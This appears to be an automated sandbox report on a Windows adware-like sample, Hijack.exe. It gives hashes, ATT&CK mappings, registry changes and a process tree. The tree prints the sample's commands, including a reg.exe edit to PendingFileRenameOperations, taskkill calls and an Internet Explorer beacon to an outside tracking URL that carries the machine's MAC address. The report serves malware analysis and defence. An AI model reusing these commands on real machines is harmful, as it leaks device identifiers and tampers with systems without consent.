22f51ffb079bc62d0373d6a7c36eb9f7806535ddf8041a89afabf255fe863060

Analysis

max time kernel
134s
max time network
129s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
19-09-2024 06:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe
Size

116KB
MD5

eac0ca3d2b45f2163a429673883d432e
SHA1

9cb19ed45145dd35cbe916d7fb20fd0b49722a70
SHA256

22f51ffb079bc62d0373d6a7c36eb9f7806535ddf8041a89afabf255fe863060
SHA512

334898e8011b5ae358163442c3a7b3f88312a35b89d928042599c1a8473eeb390a75ed51d94080cfc492c37cca7cd55b29a729155f1ebc895936bb774c12f28f
SSDEEP

3072:349KDsVqDJVAh/0sInP3kKuwSDd1o3PR2o:uqDJmGsInP3kTviPR2o

Score

7^/10

discovery

Malware Config

Signatures

Deletes itself 1 IoCs

pid	Process
2652	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2824	Hijack.exe

Loads dropped DLL 2 IoCs

pid	Process
2652	cmd.exe
2652	cmd.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\Microsoft.Nick\Hijack.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft.Nick\Hijack.exe	cmd.exe
File opened for modification	C:\Program Files\Microsoft.Nick\Hijack.bat	Hijack.exe

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hijack.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2220	PING.EXE
2844	PING.EXE

Kills process with taskkill 2 IoCs

evasion

pid	Process
3048	taskkill.exe
756	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 40 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F70B1F91-764F-11EF-9BF6-6AE4CEDF004B} = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	IEXPLORE.EXE

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2220	PING.EXE
2844	PING.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	756	taskkill.exe
Token: SeDebugPrivilege	3048	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2160	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
2080	eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe
2824	Hijack.exe
2160	IEXPLORE.EXE
2160	IEXPLORE.EXE
2252	IEXPLORE.EXE
2252	IEXPLORE.EXE
2160	IEXPLORE.EXE
2160	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 2080 wrote to memory of 2652	2080	eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe	30
PID 2080 wrote to memory of 2652	2080	eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe	30
PID 2080 wrote to memory of 2652	2080	eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe	30
PID 2080 wrote to memory of 2652	2080	eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe	30
PID 2652 wrote to memory of 2220	2652	cmd.exe	32
PID 2652 wrote to memory of 2220	2652	cmd.exe	32
PID 2652 wrote to memory of 2220	2652	cmd.exe	32
PID 2652 wrote to memory of 2220	2652	cmd.exe	32
PID 2652 wrote to memory of 2824	2652	cmd.exe	33
PID 2652 wrote to memory of 2824	2652	cmd.exe	33
PID 2652 wrote to memory of 2824	2652	cmd.exe	33
PID 2652 wrote to memory of 2824	2652	cmd.exe	33
PID 2652 wrote to memory of 2844	2652	cmd.exe	34
PID 2652 wrote to memory of 2844	2652	cmd.exe	34
PID 2652 wrote to memory of 2844	2652	cmd.exe	34
PID 2652 wrote to memory of 2844	2652	cmd.exe	34
PID 2824 wrote to memory of 1612	2824	Hijack.exe	35
PID 2824 wrote to memory of 1612	2824	Hijack.exe	35
PID 2824 wrote to memory of 1612	2824	Hijack.exe	35
PID 2824 wrote to memory of 1612	2824	Hijack.exe	35
PID 1612 wrote to memory of 2580	1612	cmd.exe	37
PID 1612 wrote to memory of 2580	1612	cmd.exe	37
PID 1612 wrote to memory of 2580	1612	cmd.exe	37
PID 1612 wrote to memory of 2580	1612	cmd.exe	37
PID 2824 wrote to memory of 2160	2824	Hijack.exe	39
PID 2824 wrote to memory of 2160	2824	Hijack.exe	39
PID 2824 wrote to memory of 2160	2824	Hijack.exe	39
PID 2824 wrote to memory of 2160	2824	Hijack.exe	39
PID 2160 wrote to memory of 2252	2160	IEXPLORE.EXE	40
PID 2160 wrote to memory of 2252	2160	IEXPLORE.EXE	40
PID 2160 wrote to memory of 2252	2160	IEXPLORE.EXE	40
PID 2160 wrote to memory of 2252	2160	IEXPLORE.EXE	40
PID 2824 wrote to memory of 756	2824	Hijack.exe	42
PID 2824 wrote to memory of 756	2824	Hijack.exe	42
PID 2824 wrote to memory of 756	2824	Hijack.exe	42
PID 2824 wrote to memory of 756	2824	Hijack.exe	42
PID 2824 wrote to memory of 2316	2824	Hijack.exe	44
PID 2824 wrote to memory of 2316	2824	Hijack.exe	44
PID 2824 wrote to memory of 2316	2824	Hijack.exe	44
PID 2824 wrote to memory of 2316	2824	Hijack.exe	44
PID 2160 wrote to memory of 2512	2160	IEXPLORE.EXE	45
PID 2160 wrote to memory of 2512	2160	IEXPLORE.EXE	45
PID 2160 wrote to memory of 2512	2160	IEXPLORE.EXE	45
PID 2160 wrote to memory of 2512	2160	IEXPLORE.EXE	45
PID 2824 wrote to memory of 3048	2824	Hijack.exe	46
PID 2824 wrote to memory of 3048	2824	Hijack.exe	46
PID 2824 wrote to memory of 3048	2824	Hijack.exe	46
PID 2824 wrote to memory of 3048	2824	Hijack.exe	46

C:\Users\Admin\AppData\Local\Temp\eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\eac0ca3d2b45f2163a429673883d432e_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\\nResurrection.bat
  2⤵
  - Deletes itself
  - Loads dropped DLL
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2652
- - C:\Windows\SysWOW64\PING.EXE
    ping -a 127.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2220
- - C:\Program Files\Microsoft.Nick\Hijack.exe
    "C:\Program Files\Microsoft.Nick\Hijack.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2824
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\\MoveFileIniti.bat
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1612
    - - C:\Windows\SysWOW64\reg.exe
        
        Reg Add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "PendingFileRenameOperations" /t REG_MULTI_SZ /d "" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2580
  - - C:\Program Files\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://www.xxx.com/tongji/count.asp?mac=6A-E4-CE-DF-00-4B&mdx=b4b147bc522828731f1a016bfa72c073189888be7b940befd5d3acecb01c5f33&ver=55-46-03-77-3
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2160
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2160 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2252
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2160 CREDAT:668683 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2512
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /pid 2160
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:756
  - - C:\Program Files\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://www.xxx.com/tongji/count.asp?mac=6A-E4-CE-DF-00-4B&mdx=b4b147bc522828731f1a016bfa72c073189888be7b940befd5d3acecb01c5f33&ver=55-46-03-77-3
      4⤵
      Modifies Internet Explorer settings
      PID:2316
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /pid 2316
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3048
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.1
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\0qn8gcy\imagestore.dat

Filesize
1KB

MD5
fa78be556e443da2e48c7968fca2d2e6

SHA1
7786c48aa801c9b2bdaa63e187ba0cc790bc59a7

SHA256
96e5f5c2315ce84a2ef2b10e08563d72c8161f591dc528534c4dd4713d837c12

SHA512
0d007483239281a71352604df3455dea3ed8efb9068a2ca7ae5e4ae7f4996fb184bbc852e261426525ee2685a2cd6bd40f72595289d6b205f0792810ed774e5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LPQ313RR\favicon-32x32[1].png

Filesize
1KB

MD5
18b70ea3cb125bf5e013fdcc129b8a0f

SHA1
73dde278643cd8be8b8286366db8e9eb21fdb111

SHA256
5ac204c00fc8a6e43f410859cd45a1f9581a68c8d9ed22f80871291298fecd0d

SHA512
165fab4a10185ccb7d3874104e450d344f9ec9b9de51051fc7af460e11b6c04589eb4b96ca5d85ad024b55f294bcd383d339c3a0fcc3e17b9cbf3854f034b504

Download Submit
C:\Users\Admin\AppData\Local\Temp\MoveFileIniti.bat

Filesize
123B

MD5
93016e1fcb6092272dda139e3e96e80e

SHA1
ff7093b48436e88e0a62ab26d071400061a57132

SHA256
497a5b0d281b2aa8b136bd9b05d55af8babc049f2de402caabd6dd9d01e40c22

SHA512
2cfba693919a050e4389a8915321accdebb2aa3430949aef86a3741e72044a3c2f5a1c2b75196af8ef725d613e57d0f9525282f434b56c1a4ea2adc390b21983

Download Submit
C:\Users\Admin\AppData\Local\Temp\nResurrection.bat

Filesize
313B

MD5
f292e8a3f9b09a15b71e0f9fded9c890

SHA1
701527bc37bb3d81467a3798030ceb02549660e4

SHA256
59b0db4235eae4967e06887a8e9024c020d11283b44713195f320926e3893f46

SHA512
e156abd1f2d8ebc17b36e0d102457c2d483591f5815825bba8c88a2403d899ba7e09dfed6560af1608b40a1b6ebfb7fd57d9dbcfa67e386dd7ee4f3f4395d446

Download Submit
\Program Files\Microsoft.Nick\Hijack.exe

Filesize
116KB

MD5
eac0ca3d2b45f2163a429673883d432e

SHA1
9cb19ed45145dd35cbe916d7fb20fd0b49722a70

SHA256
22f51ffb079bc62d0373d6a7c36eb9f7806535ddf8041a89afabf255fe863060

SHA512
334898e8011b5ae358163442c3a7b3f88312a35b89d928042599c1a8473eeb390a75ed51d94080cfc492c37cca7cd55b29a729155f1ebc895936bb774c12f28f

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads